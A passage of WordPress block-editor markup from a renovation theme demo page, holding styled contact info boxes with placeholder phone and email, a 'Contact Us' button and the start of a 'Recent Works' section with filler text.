undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">123 456 7890</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493\"} -->\n<style type=\"text/css\"> .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b2a39f6e-1e5a-4b1f-8ef9-51c2a4826493\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"127121dc-c0ee-4fa2-ab99-cde913b95087\"} -->\n<style type=\"text/css\"> .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-127121dc-c0ee-4fa2-ab99-cde913b95087 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">info@sitename.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Contact Us\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/contact-layout-1/\",\"counterId\":\"ea936b78-7fd5-42d7-956e-27032778f79c\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-ea936b78-7fd5-42d7-956e-27032778f79c skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/contact-layout-1/\">Contact Us</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"17db4860-e165-45ac-b0a9-e22b2a19eff2\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-17db4860-e165-45ac-b0a9-e22b2a19eff2 background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-17db4860-e165-45ac-b0a9-e22b2a19eff2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-17db4860-e165-45ac-b0a9-e22b2a19eff2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1a9955bb-6ac1-4576-9439-3a9b3cf54dc9\"} -->\n<style type=\"text/css\"> .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1a9955bb-6ac1-4576-9439-3a9b3cf54dc9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"72b14352-e4a7-4202-8371-898a4070517e\"} -->\n<style type=\"text/css\"> .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-72b14352-e4a7-4202-8371-898a4070517e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-72b14352-e4a7-4202-8371-898a4070517e\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-fb1b0338-3bf9-42e8-8f1d-ba091a7c1d95\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We take pride in our work</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17}},\"textColor\":\"white\",\"className\":\"section-content\"} -->\n<p class=\"section-content has-white-color has-text-color\" style=\"font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL 